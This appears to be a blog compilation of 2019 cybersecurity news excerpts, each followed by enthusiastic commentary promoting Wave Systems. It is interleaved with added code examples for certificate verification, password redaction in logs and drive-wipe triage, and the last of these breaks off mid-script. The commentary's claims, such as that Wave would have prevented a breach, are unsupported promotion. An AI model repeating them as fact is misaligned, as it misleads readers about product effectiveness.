Toyota announces second security breach in the last five weeks
https://www.zdnet.com/article/toyota-announces-second-security-breach-in-the-last-five-weeks/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem:+Trending+Content&utm_content=5c9e5d2c3ed3f00001722334&utm_medium=trueAnthem&utm_source=twitter
==================================================================
What makes this situation extraordinary is that Toyota is a TCG member and so was Wave!! With better cybersecurity potentially at its fingertips, it's hard to believe that a fantastic company like Toyota didn't have the Wave cybersecurity solutions' defensive arsenal. This situation could have been avoided with Wave solutions!!! Toyota and many other companies with similar defensive cybersecurity would do better by buying solutions from Wave Systems!! The website below really shows what excellent cybersecurity is all about!
==================================================================
https://www.wavesys.com/
The Wave Alternative is a great place to start:
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
Protecting communication within the smart factory and to the cloud: Infineon presents the world’s first TPM 2.0 for Industry 4.0
https://securityboulevard.com/2019/03/protecting-communication-within-the-smart-factory-and-to-the-cloud-infineon-presents-the-worlds-first-tpm-2-0-for-industry-4-0/
Munich, Germany – 27 March 2019 – Infineon Technologies AG (FSE: IFX / OTCQX: IFNNY) presents the world’s first Trusted Platform Module (TPM) specifically for industrial applications at this year’s Hannover Messe (Hannover, Germany, 1-5 April 2019). The OPTIGA™ TPM SLM 9670 protects the integrity and identity of industrial PCs, servers, industrial controllers or edge gateways. It controls access to sensitive data in key positions in a connected, automated factory as well as at the interface to the cloud.
The TPM acts as a vault for sensitive data in connected devices and lowers the risk of data and production losses due to cyber attacks. Users’ benefit is not limited to security only as TPMs also help to shorten time to market and reduce costs for industrial applications. Through the use of Infineon’s audited and certified TPMs, manufacturers of industrial devices can achieve higher security levels of the IEC 62443* standard and accelerate their certification processes. Furthermore, they can cut costs for maintenance of the devices through secured remote software updates.
The OPTIGA TPM SLM 9670 fully meets the TPM 2.0 standard of the Trusted Computing Group and is certified by an independent test lab in accordance with Common Criteria**. With a service life of 20 years and the ability to update the firmware on the chip, the TPM is able to cope with long-term security risks that may be encountered in an industrial environment. The chip boasts an extended temperature range of -40° to 105° Celsius and meets the stringent requirements of industry in terms of robustness and quality as it is qualified according to the industrial JEDEC JESD47 standard.
Availability
The OPTIGA TPM SLM 9670 is manufactured at Infineon’s security-certified facilities in Germany and will be available in large volumes from the second half of 2019. For more information please go to www.infineon.com/industrial-tpm
Infineon at the Hannover Messe
The Internet of Things is increasing the fields of application for the TPM. With its extensive OPTIGA TPM product family, Infineon offers application-specific solutions for business PCs and routers, connected vehicles, or cloud applications.
The OPTIGA TPM SLM 9670 will be presented for the first time at this year’s Hannover Messe, the world’s leading industrial show. Infineon will show various products and a demonstrator for energy-efficient and secured smart factories at the stand of Amazon Web Services (Hall 6, Stand F46). This demo also includes an edge gateway, which is a perfect place for the strong security of the OPTIGA TPM SLM 9670 because of the gateway’s central and security-critical function in industrial networks.
* IEC 62443 is an international series of standards that defines the IT security requirements for industrial communication networks.
**Common Criteria is an international standard for computer security certification.
=================================================================
Another great application for the Trusted Platform Module (TPM)! The TPM could be protecting billions of devices from cyber attacks if turned on!! TPM 1.2 and TPM 2.0 turned on are better than software security alone! With all the cyber attacks occurring on a daily basis, it makes sense that both TPM versions should be activated en masse. Wave has an opportunity to be the 'beacon of light' on these activations, and the great solutions they have involving the TPM!!!
==================================================================
https://www.wavesys.com/
What is Wrong with IoT Security Today?
https://www.infosecurity-magazine.com/opinions/wrong-iot-today-1/?utm_source=dlvr.it&utm_medium=twitter
The list of Internet of Things (IoT) devices is growing quickly, and so are the security concerns. As more devices get connected to the internet, the network expands and volumes of data increase, putting more sensitive information at risk.
Currently, most IoT devices have poor security in place. In fact, most IoT device manufacturers ship devices with a default password and don’t give the customers an option to change it. According to the 2019 Internet Security Threat Report, targeted attack groups are increasingly focused on IoT as a soft entry point, where they can destroy or wipe a device and steal credentials and data. Although routers and connected cameras make up 90% of infected devices, almost every IoT device from smart light bulbs to voice assistants is vulnerable, according to the report.
Today, many companies are using home brew passwords and “tricks” in their software, both of which make them inherently insecure. Some are using symmetric encryption, but then the “password” is the same across all devices. Hack one, you can hack them all.
Many organizations are using Public Key Infrastructure (PKI), but doing so without thinking beyond the next couple of years, while others aren’t thinking about changing crypto needs and lifetime issues down the road.
Why Consider PKI?
The rise of the IoT is driving the deployment of applications using PKI, with 43% of IoT devices expected to rely primarily on digital certificates in the next two years, according to the 2018 Global PKI Trends Study. A well-designed PKI combines roles, policies, software, and hardware elements to enable secure electronic transfer of information—far more securely than what is possible with simple password authentication.
Why is PKI a good choice for IoT? PKI is a disconnected verification system; there is no need for a centralized server. Devices that are participating in the same PKI can validate each other’s identities and encrypt information just from exchanging their certificates. These certificates can have cryptographic keys with validity periods that far exceed the usable lifetime of any other authentication system.
Security is Not One Size Fits All
Security needs for devices are different. I recently spoke with Jeff Stapleton, co-author of Security without Obscurity: A Guide to PKI Operations about the importance of a holistic approach to PKI. Stapleton explains that the sensitivity of the data, the longevity of the information, and now privacy all need to be considered and addressed by the PKI in its design, operations, and management.
This applies to IoT devices at all levels. When factoring in security, developers of IoT devices need to consider the longevity of the key exchange and consider the lifetime of the device: for example if a device has a 10-year lifecycle, a 50-year lifecycle (and cannot be updated), etc.
Securing devices over their lifetimes is critical to the safety and use of these devices, regardless of how they are used. The lifetime of an IoT device can range from short-lived devices (temperature sensor) to a device with a long lifespan, designed to last 100 years (water pump), which makes creating and managing a security infrastructure for IoT systems incredibly complex.
It also cannot just be what works for today’s customer. IoT manufacturers need to take a holistic approach and look at how long these devices will be in the field and how they can expect to find a security process that will stand the test of time or allow them to field upgrade. In addition, manufacturers have to think 10-15 years down the road and think about how their devices today will interoperate with their device security for things they haven’t even developed yet.
A single approach to security and device lifetime can’t work for all devices. Many commercial solutions and cloud providers that provide cloud-based identities consider 40 years to be “long enough.” In fact, I had to chase AWS down as the company was reporting “lifetime identities.” This is impossible; it turned out it was 42 years maximum. Long-life devices need to be built to withstand cryptographic changes – what is secure today won’t be ten years from now, let alone in 50 years.
Five Security Goals Companies Need
Devices need to be built to interoperate with each other. A device sold today that is expected to be used for ten years is likely to encounter a newer release from the manufacturer, and that older and newer model may need to interoperate cohesively during the supported lifetime. Here are the top five security goals that I recommend that companies put into practice:
1. Cryptography must be not just secure enough for today; companies need to think through the device lifecycle across the current generation and its interaction with future generations. At PKI Solutions, one thing that we have done is pre-create a future CA that has cryptography keys we expect to be common 20 years from now. We bake that identity into the trusted list of devices today, so when new devices come out they are already trusted.
2. Devices using RSA keys should expect those keys to be renewed on a regular basis. Best practice is to renew every two to three years. Computationally, they can be used for longer periods of time in controlled environments. Elliptic curve cryptography (ECC)-based encryption can provide a longer period of expected validity.
3. Devices that will be used and deployed in isolated environments (heavy machinery, industrial controls, secure environments) must have enough intelligence to roll keys and validate identities from other compatible devices. Manufacturers need to make sure firmware and other updates have a method to trigger changes to new cryptography and trust chains.
4. Hardware protection is critical to IoT. Long-lived keys will always be vulnerable. They are in use too long not to be examined, and the potential for exploit is huge. Using Trusted Platform Module (TPM)-embedded silicon to secure identities is the best method. Storing identities and keys in firmware or software will never be secure enough.
5. Avoid self-signed certificates to authenticate devices. They are inherently insecure and provide little to authenticate a valid host to a user or another device. They also train users to ignore certificate and identity errors. Manufacturers should strive to ensure their identities are trusted from the first use of their device.
=================================================================
There seems to be a large concern to have IoT devices properly secured. Shouldn't there be a large concern as well about TPMs (hardware) not being turned on in computers?! And as this author indicates, for IoT devices, using TPMs to secure identities is the best method, and hardware is better than software for storing identities.
=================================================================
https://www.wavesys.com/
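The article above makes three concrete claims about device PKI: peers in the same PKI validate each other offline with no central server, a root prepared for a future hardware generation can be baked into today's trust list so later devices are trusted on first contact, and self-signed device certificates should be rejected. The Go program below is an added example written for this page, not code from Infosecurity Magazine, PKI Solutions or Wave. It builds a throwaway root in service today, a second root pre-created for a later generation, a device certificate under each, and a self-signed device certificate, then reports what a device shipped with only the current root accepts versus one shipped with both roots. Every name in it ("Example Device Root 2019", "sensor-0001" and so on) is invented; both roots use ECDSA P-256 for brevity where a real deployment might pair today's RSA root with an ECC root for later; and the 20- and 40-year root lifetimes are illustrative.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// issue creates an ECDSA P-256 certificate for cn. With parent == nil the
// certificate is self-signed; otherwise it is signed by parentKey and chains
// to parent. years is the validity period: a few years for a device
// certificate, decades for a root.
func issue(cn string, isCA bool, years int, parent *x509.Certificate,
	parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	serial, err := rand.Int(rand.Reader, new(big.Int).Lsh(big.NewInt(1), 128))
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          serial,
		Subject:               pkix.Name{CommonName: cn}, // invented names
		NotBefore:             time.Now().Add(-time.Hour), // tolerate clock skew
		NotAfter:              time.Now().AddDate(years, 0, 0),
		KeyUsage:              x509.KeyUsageDigitalSignature,
		BasicConstraintsValid: true,
		IsCA:                  isCA,
	}
	if isCA {
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	} else {
		tmpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}
	}
	signer, signerKey := tmpl, key // self-signed unless a parent is given
	if parent != nil {
		signer, signerKey = parent, parentKey
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// accepted reports whether peer chains to a root in trusted. Nothing here
// contacts a server: the verifier needs only its local trust list and the
// certificate the peer presented.
func accepted(peer *x509.Certificate, trusted *x509.CertPool) bool {
	_, err := peer.Verify(x509.VerifyOptions{
		Roots:     trusted,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	})
	return err == nil
}

// Outcome records which peers a device built with a given trust list accepts.
type Outcome struct {
	CurrentPeer, FuturePeer, SelfSigned bool
}

// Scenario returns what a device shipped with only today's root accepts and
// what a device shipped with today's root plus the pre-created future root
// accepts, against a current-generation peer, a future-generation peer and a
// peer that merely self-signed its identity.
func Scenario() (onlyCurrent, both Outcome, err error) {
	rootNow, rootNowKey, err := issue("Example Device Root 2019", true, 20, nil, nil)
	if err != nil {
		return
	}
	rootFuture, rootFutureKey, err := issue("Example Device Root 2039", true, 40, nil, nil)
	if err != nil {
		return
	}
	devNow, _, err := issue("sensor-0001", false, 3, rootNow, rootNowKey)
	if err != nil {
		return
	}
	devFuture, _, err := issue("sensor-9001", false, 3, rootFuture, rootFutureKey)
	if err != nil {
		return
	}
	devSelf, _, err := issue("sensor-rogue", false, 3, nil, nil)
	if err != nil {
		return
	}
	current := x509.NewCertPool()
	current.AddCert(rootNow)
	withFuture := x509.NewCertPool()
	withFuture.AddCert(rootNow)
	withFuture.AddCert(rootFuture)
	check := func(p *x509.CertPool) Outcome {
		return Outcome{accepted(devNow, p), accepted(devFuture, p), accepted(devSelf, p)}
	}
	return check(current), check(withFuture), nil
}

func main() {
	a, b, err := Scenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("trust list with current root only:        %+v\n", a)
	fmt.Printf("trust list with current and future roots: %+v\n", b)
}
```

The verification step never leaves the device, which is the disconnected property the article describes. Two caveats a practitioner should keep in mind: pre-trusting a future root only helps if that root's private key stays offline until its generation ships, and certificate lifetime is a separate decision from key lifetime, so the device certificates here expire after three years while the roots last decades.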
Insurers Collaborate on Cybersecurity Ratings
https://www.darkreading.com/risk/insurers-collaborate-on-cybersecurity-ratings/d/d-id/1334258
A group of insurers will base rates and terms on whether customers purchase technology that has earned a stamp of approval.
It's in the best interest of insurance companies to have their customers protected from cybersecurity losses. That, in a nutshell, is why a number of global insurers are collaborating on a rating system for cybersecurity products.
According to The Wall Street Journal, Marsh & McLennan, a professional services company specializing in risk and insurance, will evaluate enterprise cybersecurity technology in a program called "Cyber Catalyst." The article states, "Marsh will collate scores from participating insurers, which will individually size up the offerings, and identify the products and services considered effective in reducing cyber risk."
Companies that choose security products from among the approved selection may find themselves qualified for improved insurance terms and conditions. Insurers already signed up to participate include Allianz SE, AXA SA, Axis Capital Holdings Ltd, Beazley PLC, CFC Underwriting Ltd., Munich Re, Sompo International, and Zurich Insurance Group AG.
=================================================================
AXA and Wave could show the other insurers how tremendous Wave VSC 2.0 is, (read article below) and the insurers could give Wave VSC 2.0 more than just a stamp of approval!!
==================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Lee, MA -
December 17, 2015 -
Wave Systems Corp. (NASDAQ: WAVX) announces a five-year master licensing agreement (MLA) with a leading global corporation (as determined by the 2015 Fortune Global 500 List) for its Virtual Smart Card 2.0 solution. This MLA sets the terms and pricing for licenses and maintenance across the customer’s global organization and establishes it as their preferred two-factor authentication solution. Instead of one large license purchase for the entire organization, each of the customer’s subordinate divisions will make separate orders in accordance with the terms of this MLA.
The first purchase of 2,000 VSC 2.0 licenses under this agreement, when added to a previous purchase, completes the requirement for the customer’s global IT division. That division will now lead the internal effort to standardize the remaining 150,000+ endpoints within their organization with the new Wave VSC 2.0 solution. While there are no minimum order requirements under the agreement, discussions for additional orders are underway.
“Our five-year agreement with this customer is the first very large scale contract for VSC 2.0 and is an important milestone for Wave,” said Bill Solms, President and CEO of Wave Systems. “This customer is a major global financial services company and their standards for protecting their systems from unauthorized access and the integrity of their data are of the highest order. Wave had to pass a very rigorous technical and business review to win the competition. We believe that this client’s decision to choose Wave Virtual Smart Card 2.0 over their incumbent solution gives us tremendous credibility in the two-factor authentication market. We will remain engaged with this company in order to complete the additional sales and deployments in the months ahead.”
Wave Virtual Smart Card 2.0 is a tokenless, hardware-based, two-factor authentication solution that offers superior security at less than half the cost of comparable solutions. It is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7, 8 and 10. It also provides management support for the Microsoft Virtual Smart Card on Windows 8 and 10. Wave’s VSC solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, significantly lower total cost of ownership, and a greatly reduced risk of unauthorized access.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure Passphrase and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with both TPM 1.2 and TPM 2.0 security chips
For more information, visit: Wave Virtual Smart Card 2.0
https://www.wavesys.com/
Orgs Grapple with Pros and Cons of Remote Workers
https://www.infosecurity-magazine.com/news/orgs-grapple-with-pros-cons-of-1?utm_source=twitterfeed&utm_medium=twitter
Despite the growing number of employees that work remotely, security professionals fear that remote workers pose risks to the enterprise, according to a new study published by OpenVPN.
An overwhelming majority (90%) of survey respondents said that remote workers are a security risk to the organization, according to the report Remote Work Is the Future – But Is Your Organization Ready for It? The report’s findings are based on a survey of 250 IT leaders, from the manager level through the C-suite.
Still, 92% of respondents agreed that the benefits of remote work outweigh the security risks. “For employees, it provides greater efficiency and lower stress levels: 82% of telecommuters reported less stress and 30% said it allowed them to accomplish more work in less time,” the report said. In addition, companies reportedly save an average of $11,000 per year per remote employee.
Despite the fact that 93% of organizations have a remote work security policy in place and 90% of organizations offer security training for remote workers, more than a third (36%) of companies have experienced a security incident due to a remote worker. That more than one in three organizations have suffered a security incident because of a remote worker is somewhat alarming when considering that nearly 70% of employees globally now work remotely at least once a week, the report said.
Of those who have suffered a security incident, 68% experienced it within the last year, yet the survey shows that nearly a quarter of organizations (24%) haven’t updated their remote work security policy in the same time frame.
While less than half (49%) of IT leaders said they only somewhat agreed that remote employees adhere to the organization’s remote work policies, the results vary depending on the role of the respondent. “Executives are particularly concerned about the risk remote workers pose, as nearly three-quarters (73 percent) of VP and C-suite IT leaders believe remote workers pose a greater risk than onsite employees, compared to 48 percent of IT managers and 45 percent of IT directors,” the study found.
=================================================================
Apparently more than 1/3 (36%) haven't heard of Wave VSC 2.0 and Wave SED management, or they're not using them. These two solutions from Wave could cut down on the security incidents these companies are having!!! When Wave VSC 2.0 is used, a hacker needs the PIN and would also need the remote worker's computer (TPM) to log in to the company network. The PIN is much more difficult to obtain (in TPM) than usernames and passwords that are plentiful on the Dark Web.
A lost PC by a remote worker can be protected by being fully encrypted (SED). These SEDs can be managed by Wave SED management.
Wave has other solutions that could be beneficial to companies and their remote workers!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/
Some Windows 7, 8.1 users reporting Security Essentials and Windows Defender problems
https://www.zdnet.com/article/some-windows-7-8-1-users-reporting-security-essentials-and-windows-defender-problems/
Some Windows 7 and 8.1 users are noticing that their automatic anti-malware protection has been turned off and are seeing out-of-date virus definitions. A definition update fix is available now.
A number of Windows 7 and 8.1 users are encountering problems with Microsoft Security Essentials and Windows Defender. Users are seeing their automatic anti-malware protection turned off without their knowledge and are seeing out-of-date virus definitions. The problem is happening with some, but not all, users for the past several hours. Windows 10 users don't seem to be affected.
I just tried running a manual Security Essentials scan on my Windows 7 SP1 desktop machine and got error message 0x800106ba. I, like others reporting the issue, received a warning that my PC couldn't be scanned and my anti-malware service had stopped.
Microsoft Security Essentials provides a fuller range of protection against malicious software than Windows Defender. MSE is meant to protect against viruses, worms, Trojans, rootkits, spyware and more.
I have no idea how many users are affected, but saw early reports of this on AskWoody.com. There are more reports of the same issue on the Microsoft.com Answers site. Some System Center Endpoint Protection users also are reporting problems and have been guessing that a faulty virus definition could be the culprit.
I'm hearing from sources that a definition update that will fix the issue should be out in the next hour or so (by 3 pm ET or so), and that the problem, introduced in signatures 1.289.1521.0, could be mitigated in signatures 1.289.1587 or newer.
I've asked Microsoft for official comment. No word back so far.
Update (March 19, 8 pm ET): "We've resolved this issue, which appears to have been limited to Windows 7 and Windows Server 2008," said a Microsoft spokesperson via an emailed statement. The spokesperson didn't mention the updated definition that's now available, but here's information on 1.289.1588.0, posted by Microsoft on March 19. Just a reminder, Microsoft, that you've promised to support Windows 7 for free until January 14, 2020....
Yesterday, March 18, a number of IT administrators were reporting sync issues with Windows Server Update Services (WSUS). That issue also may have had something to do with virus definitions. (Thanks to @d_vickery on Twitter for that reminder.)
==================================================================
Given the problems reported with Security Essentials and Windows Defender, a comprehensive anti-malware solution like Wave Endpoint Monitor could spot the sneaky attacks and be working when a situation like this arises or replace Security Essentials and Windows Defender altogether.
==================================================================
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
Government cyber security strategy is ‘chaotic’
https://www.computerweekly.com/news/252460018/Government-cyber-security-strategy-is-chaotic
Excerpts:
The UK cyber security strategy is in a “chaotic” state, shadow Cabinet Office minister Jo Platt has said.
Speaking at the ICT Public Sector event yesterday (21 March 2019), Platt told the audience the security measures in place to protect the UK against a cyber attack were insufficient.
“It’s clear that we need a new strategy. We cannot wait for another WannaCry or worse before we take action. We know a crippling attack is coming our way – the question is when, not if – and when it does, a Labour government will be ready for it,” Platt said.
=================================================================
Wave solutions could be an enormous help with a newly improved UK cybersecurity strategy!!
=================================================================
https://www.wavesys.com/
Change your Facebook password now!
https://nakedsecurity.sophos.com/2019/03/21/change-your-facebook-password-now/
Oh, feet of clay!
Facebook has just admitted that it has found many places – hundreds of millions of places, maybe – where it saved users’ passwords to disk in raw, unencrypted form.
In jargon terms, they’re known as plaintext passwords and it means that instead of seeing a password scrambled into a hashed form such as 379f1531753a7c43ab4f4faace212451, anyone looking at the stored data will see the actual password, right there, just like that.
Like that: 123456789, or that: mypassword99, or that: jw45X$/6FsT8.
Plaintext passwords used to be commonplace, decades ago, but it’s become technically, socially and even morally irresponsible to save raw passwords over the years, a bit like drink-driving has become not only a statutory offence but also outright unacceptable on the road.
In other words, it used to be the norm; then it was the thing you only did if you thought you wouldn’t get caught; and today it’s something that gets the book thrown at you, given that it’s so easy to get it right and so risky to get it wrong.
How did Facebook make such a basic mistake?
The good news is that the wrongly stored passwords don’t seem to be part of Facebook’s externally-accessible authentication system.
In other words, the Facebook gateway servers that let outside users log in aren’t festooned with raw copies of everyone’s passwords.
Instead, it looks as though some Facebook programmers have, over the years – back to 2012, according to cybersecurity journalist Brian Krebs – been careless when writing logfile entries.
In other words, instead of securely disposing of password data from memory after it’s been used to verify a login, they’ve allowed that data to stick around for a while, where it’s ended up in one or more logfiles where it simply didn’t need to be recorded, and shouldn’t have been.
It’s OK to keep access data such as username, timestamp, browser type, country and so on…
…but programmers are duty bound to dispose of data carefully and promptly if it isn’t supposed to be stored after it’s served its purpose.
Like passwords.
The idea is simple: if you bump password data out of memory the instant that you no longer absolutely require it, then no one else can accidentally leak it later on.
Simply put, you can’t lose data you don’t have.
How bad is this?
Apparently, correctly bumping password data out of memory didn’t always happen in Facebook’s code.
As a detailed audit by Facebook now reveals, littered amongst the ziggabytes of data on its grillions of servers were millions of passwords inadvertently saved to disk where they should never have been.
According to Krebs:
A written statement from Facebook provided to KrebsOnSecurity says the company expects to notify “hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users.”
Facebook Lite is a stripped-down flavour of Facebook used in countries where mobile data plans are hard to come by and expensive.
Should I close my Facebook account?
We can’t answer that for you.
Given that the wrongly stored passwords weren’t easily accessible in one database, or deliberately stored for routine use during logins, we don’t think this breach alone is enough reason to terminate your account.
On the other hand, it’s a pretty poor look for Facebook, and it might be enough, amongst all the other privacy concerns that have dogged Facebook in recent years, to convince you to take that final step.
In short, we’re not advising you to close your account, but we are suggesting you factor this lapse in coding quality into your overall decision on what to do next.
But you have to decide for yourself. (For what it’s worth, we’re not closing our account.)
Should I change my Facebook password?
Why not?
It’s perfectly possible that no passwords at all fell into the hands of any crooks as a result of this.
But if any passwords did get into the wrong hands (and you can bet your boots that the crooks are trawling through any old data they might have right now, to see if there is anything they missed before!), then they are ready for abuse right away.
Hashed passwords still need to be cracked before they can be used; plaintext passwords are the real deal without any further hacking or cracking needed.
So our advice is: don't wait for Facebook; change your password now. (We already did!)
Should I turn on two-factor authentication?
Yes.
We’ve been urging you to do this everywhere you can anyway – it means that a password alone isn’t enough for crooks to raid your account.
If you are reluctant to give Facebook your phone number, use app-based authentication, where your mobile phone generates a one-time code each time you log in.
So we say: turn on 2FA now. (We did it ages ago!)
The short version
• Change your Facebook password now. Don’t wait for Facebook to contact you.
• Turn on 2FA if you haven’t already. It’s a small inconvenience for a big jump in security.
Then you can figure out whether you want to ditch your account, without making a snap decision you might later regret.
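As an added example (not code from the article or from Facebook), a Python logging filter that scrubs password values before a record reaches disk, plus a scanner for old log files where one already did; the key names and the sample log lines are constructed.

```python
"""Added example (not from the article or Facebook's code): keep passwords
out of application logs, and find lines where one slipped through."""
import io
import logging
import re
from typing import List

# Keys whose values must never reach disk in the clear (assumed list).
SENSITIVE_KEYS = ("password", "passwd", "pwd", "secret", "token")

# key=value, key: value and "key": "value" styles; group 3 is the value.
_SENSITIVE_RE = re.compile(
    r"(?i)(" + "|".join(SENSITIVE_KEYS) + r")\b(\"?\s*[:=]\s*\"?)([^\s\"',;&]+)"
)


def redact(message: str) -> str:
    """Replace the value of every sensitive key with a fixed marker."""
    return _SENSITIVE_RE.sub(lambda m: f"{m.group(1)}{m.group(2)}[REDACTED]", message)


class RedactingFilter(logging.Filter):
    """Scrub the rendered message before any handler can write it.

    Formatting happens here (getMessage) so that values passed as %-args
    are covered too, not just literals in the format string.
    """

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact(record.getMessage())
        record.args = ()
        return True


def build_logger(stream: io.StringIO) -> logging.Logger:
    """A logger that writes to the given stream through the redacting filter."""
    logger = logging.getLogger("auth-demo")
    logger.handlers.clear()
    logger.filters.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    logger.addFilter(RedactingFilter())
    return logger


def demo_logger_output() -> str:
    """Log a login attempt the way careless code might, return what reached the stream."""
    stream = io.StringIO()
    log = build_logger(stream)
    log.info("login attempt user=%s password=%s", "alice", "hunter2")
    return stream.getvalue().strip()


def find_leaks(log_lines: List[str]) -> List[int]:
    """1-based numbers of lines that still carry a sensitive value in the clear."""
    leaks = []
    for n, line in enumerate(log_lines, 1):
        if any(m.group(3) != "[REDACTED]" for m in _SENSITIVE_RE.finditer(line)):
            leaks.append(n)
    return leaks


if __name__ == "__main__":
    print(demo_logger_output())
    # Constructed log lines standing in for an old log file on disk.
    print(find_leaks(["POST /login user=alice password=hunter2",
                      "GET /home user=alice",
                      "auth ok token=[REDACTED]"]))
```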
==================================================================
Years ago Wave, Bill Solms, and Steven Sprague would have been very interested in an article like this. Wave Solutions could strongly benefit the market with solutions like Wave VSC 2.0 and Wave Knowd (in retirement)!! Wave has remarkable solutions and cybersecurity articles continue to reinforce that!! I think Wave solutions were actually ready ahead of its time!!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/buzz/pr/wave-knowd-introduces-new-model-internet-authentication-without-passwords
Less Than 3% of Recycled Computing Devices Properly Wiped
https://www.darkreading.com/vulnerabilities---threats/less-than-3--of-recycled-computing-devices-properly-wiped/d/d-id/1334208?_mc=sm_iwfs_editor_kellysheridan
Researchers find that companies that refurbish or accept old equipment as donations don't necessarily clean them of data as promised.
Here's some eye-popping data about the computing devices that wind up at businesses that refurbish computers or accept donated devices: Out of 85 devices tested by researchers at Rapid7, only two were wiped properly – and three were encrypted.
Tod Beardsley, director of research at Rapid7, says the study was the brainchild of Josh Frantz, a senior security consultant at Rapid7, who made the project a labor of love on nights and weekends.
Frantz tested desktops, laptops, removable media, hard drives, and cell phones from 31 businesses around his home in Wisconsin. He spent about $600 on the equipment. At the end of the six-month project, he found that many of the refurbishing and donation businesses don't actually wipe data from those devices as promised.
"One of the big problems with the devices that wind up at these places is that it's often hard to distinguish between work and personal devices today because so many people mix their personal and work lives," Beardsley says. "From an IT perspective, it's really important for corporate IT departments to set a policy that when the company refreshes devices that they all get wiped before the employee receives the new device. And for personal devices like a smartphone, it's much easier today to wipe a phone and return it to the factory settings."
In a blog posted by Rapid7 earlier this week, Frantz reported some of his findings. Data found on the exposed devices included the following:
•41 Social Security numbers
•19 credit card numbers
•Two passport numbers
•147,000 emails
•214,000 images/photos
Frank Dickson, a research vice president at IDC, says it's actually surprising that Rapid7 found any computers that were properly wiped. He says companies should be careful about everything from old ATM machines (not all ATMs are properly managed by banks), printers, fax machines, computers, and smartphones.
"With printers, for example, the company may have it on a lease so they have to be sure to wipe the data on those printers before it goes back to the leasing company," Dickson says. "While it's not clear how large a threat vector this is, the opportunity is there. This is one of the easiest security issues to solve. You just have to remove the threat.
"If you don't have time to wipe the device, use a hammer."
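Added example, not Rapid7's methodology or code: a sector-by-sector triage of a drive image that sorts it into the article's three buckets (properly wiped, encrypted, still carrying data); the magic-byte list, the entropy threshold and the three sample images are all constructed.

```python
"""Added example (not Rapid7's methodology or code): sort a drive image into the
article's three buckets: properly wiped, encrypted, or still carrying data."""
import hashlib
import math
from collections import Counter
from typing import Dict

SECTOR = 512
# Signatures that betray leftover user files (common magic bytes, assumed list).
MAGICS = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG": "png",
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip/office",
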